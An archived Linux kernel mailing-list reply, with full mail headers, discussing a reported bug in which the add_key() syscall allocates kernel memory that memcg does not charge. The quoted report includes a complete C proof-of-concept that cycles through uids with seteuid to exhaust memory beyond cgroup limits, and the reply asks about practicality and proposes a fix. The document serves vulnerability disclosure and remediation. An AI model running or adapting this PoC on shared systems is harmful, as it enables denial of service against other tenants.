From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on aws-us-west-2-korg-lkml-1.web.codeaurora.org X-Spam-Level: X-Spam-Status: No, score=-3.6 required=3.0 tests=BAYES_00,DKIM_INVALID, DKIM_SIGNED,HEADER_FROM_DIFFERENT_DOMAINS,MAILING_LIST_MULTI,SPF_HELO_NONE, SPF_PASS autolearn=no autolearn_force=no version=3.4.0 Received: from mail.kernel.org (mail.kernel.org [198.145.29.99]) by smtp.lore.kernel.org (Postfix) with ESMTP id D6ECEC433DB for ; Mon, 29 Mar 2021 07:39:47 +0000 (UTC) Received: from kanga.kvack.org (kanga.kvack.org [205.233.56.17]) by mail.kernel.org (Postfix) with ESMTP id 3DA6E6193A for ; Mon, 29 Mar 2021 07:39:47 +0000 (UTC) DMARC-Filter: OpenDMARC Filter v1.3.2 mail.kernel.org 3DA6E6193A Authentication-Results: mail.kernel.org; dmarc=fail (p=quarantine dis=none) header.from=suse.com Authentication-Results: mail.kernel.org; spf=pass smtp.mailfrom=owner-linux-mm@kvack.org Received: by kanga.kvack.org (Postfix) id 935A96B0074; Mon, 29 Mar 2021 03:39:46 -0400 (EDT) Received: by kanga.kvack.org (Postfix, from userid 40) id 8E4F16B0075; Mon, 29 Mar 2021 03:39:46 -0400 (EDT) X-Delivered-To: int-list-linux-mm@kvack.org Received: by kanga.kvack.org (Postfix, from userid 63042) id 7858F6B0078; Mon, 29 Mar 2021 03:39:46 -0400 (EDT) X-Delivered-To: linux-mm@kvack.org Received: from forelay.hostedemail.com (smtprelay0102.hostedemail.com [216.40.44.102]) by kanga.kvack.org (Postfix) with ESMTP id 598956B0074 for ; Mon, 29 Mar 2021 03:39:46 -0400 (EDT) Received: from smtpin16.hostedemail.com (10.5.19.251.rfc1918.com [10.5.19.251]) by forelay04.hostedemail.com (Postfix) with ESMTP id F0819815E for ; Mon, 29 Mar 2021 07:39:45 +0000 (UTC) X-FDA: 77972112330.16.DC51C9A Received: from mx2.suse.de (mx2.suse.de [195.135.220.15]) by imf26.hostedemail.com (Postfix) with ESMTP id 1D0B640002CD for ; Mon, 29 Mar 2021 07:39:42 +0000 (UTC) X-Virus-Scanned: by amavisd-new at test-mx.suse.de DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.com; s=susede1; t=1617003584; h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc: mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding: in-reply-to:in-reply-to:references:references; bh=Awe1edIW7HAOiUt+RBmLfJWuVVokUbchDFh5Qge6oI8=; b=NUKM6iFAgfWtvIpxM1eVye/CaKKOmtbFhRt+GxNMj3mSSxxJ6JwxzDx+HN7S3qY0VIp5M7 cfYqWae/+dJlrfwmYmTkc5g6O9SH0aExLdx7dkvk7SJBnIzJJ54i9px7+cOiRUsNF7sjGO CWpItdr5zzVGHzFTyeb6mZok62wNRWM= Received: from relay2.suse.de (unknown [195.135.221.27]) by mx2.suse.de (Postfix) with ESMTP id E8D55AE89; Mon, 29 Mar 2021 07:39:43 +0000 (UTC) Date: Mon, 29 Mar 2021 09:39:42 +0200 From: Michal Hocko To: =?utf-8?B?5p2o5pix5aSp?= Cc: hannes@cmpxchg.org, vdavydov.dev@gmail.com, cgroups@vger.kernel.org, linux-mm@kvack.org, shenwenbosmile@gmail.com, David Howells , Jarkko Sakkinen , James Morris , "Serge E. Hallyn" , keyrings@vger.kernel.org, linux-security-module@vger.kernel.org Subject: Re: add_key() syscall can lead to bypassing memcg limits Message-ID: References: <7d222142.1e89e.17876ab335a.Coremail.ytyang@zju.edu.cn> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline In-Reply-To: <7d222142.1e89e.17876ab335a.Coremail.ytyang@zju.edu.cn> X-Rspamd-Server: rspam01 X-Rspamd-Queue-Id: 1D0B640002CD X-Stat-Signature: hewcpjjfs8g6jm8p6zr1nmmipq3sepnf Received-SPF: none (suse.com>: No applicable sender policy available) receiver=imf26; identity=mailfrom; envelope-from=""; helo=mx2.suse.de; client-ip=195.135.220.15 X-HE-DKIM-Result: pass/pass X-HE-Tag: 1617003582-208935 Content-Transfer-Encoding: quoted-printable X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=1.2.4 Sender: owner-linux-mm@kvack.org Precedence: bulk X-Loop: owner-majordomo@kvack.org List-ID: Cc keyctl maintainers On Sun 28-03-21 10:30:34, =E6=9D=A8=E6=98=B1=E5=A4=A9 wrote: > Hi, our team has found a bug in key_alloc() on Linux kernel v5.10.19, w= hich leads to bypassing memcg limits. > The bug is caused by the code snippets listed below: >=20 > /*--------------- key.c --------------------*/ > ... > 276/* allocate and initialise the key and its description */ > 277key =3D kmem_cache_zalloc(key_jar, GFP_KERNEL); > 278if (!key) > 279goto no_memory_2; > ... > /*---------------- end ---------------------*/ >=20 > /*------------- keyctl.c -------------------*/ > ... > 95 if (_description) { > 96description =3D strndup_user(_description, KEY_MAX_DESC_SIZE); > 97if (IS_ERR(description)) { > ... > /*--------------- end ---------------------*/ >=20 > Each user can allocate ~20KB uncharged memory by calling add_key syscal= l to trigger the listed code. > Code at line 277 in the first snippet allocates a new struct key object= that is not charged by memcg, as no accouting flag is passed to neither = the > allocation site here nor the key_jar's creating site. At line 96 in the= second snippet, we found that memory used by description of a key,=20 > which has a maximum size of 4096 bytes, is also not charged. A user can= allocate multiple keys and consume more uncharged memory.=20 > The upper limit of key memory's size is set to 20,000 bytes by default = for each user. >=20 > The bug can cause severe memcg limit bypassing if a process can change = its uid and bypass the above limit. For example, a user may own root priv= ilege=20 > in its user namespace and leverage seteuid() syscall to continuously ch= ange its uid.=20 > Our evaluation on QEMU v5.1.0 + cgroup v2 shows that, under this assump= tion, we could consume ~2.2G memory by allocating keys from 100,000 diffe= rent uids, while the memory charged by memcg is ~215MB. Can the user/attacker create all those different uids? Or what would be a typical scenario where this a threat? In other words is this a practical attack vector? If yes then the mitigation woulld be quite easy for the key_jar (just add __GFP_ACCOUNT). I am not aware we would have strndup_user alternative with kemecg enabled so this would have to be added. >=20 > The PoC code is listed below: >=20 > /*--------------- PoC --------------------*/ > #include > #include > #include > #include > #include > #include > #include >=20 > char desc[4000]; > void alloc_key_user(int id) { > int i =3D 0, times =3D -1; > __s32 serial =3D 0; > int res_uid =3D seteuid(id); > if (res_uid =3D=3D 0) > printf("uid allocation success on id %d!\n", id); > else { > printf("uid allocation failed on id %d!\n", id); > return; > } > srand(time(0)); > while (serial !=3D 0xffffffff) { > ++times; > for (i =3D 0; i < 3900; ++i) > desc[i] =3D rand()%255 + 1; > desc[i] =3D '\0'; > serial =3D syscall(__NR_add_key, "user", desc, "payload", > strlen("payload"), KEY_SPEC_SESSION_KEYRING); > } > printf("allocation happened %d times.\n", times); > seteuid(0); > } >=20 > int main() { > int loop_times =3D 0; > int start_uid =3D 0; > scanf("%d %d", &start_uid, &loop_times); > for (int i =3D 0; i < loop_times; ++i) { > alloc_key_user(i+start_uid); > } > return 0; > } >=20 > /*-------------PoC end ---------------------*/ >=20 > Thanks! >=20 > Best regards, > Yutian Yang --=20 Michal Hocko SUSE Labs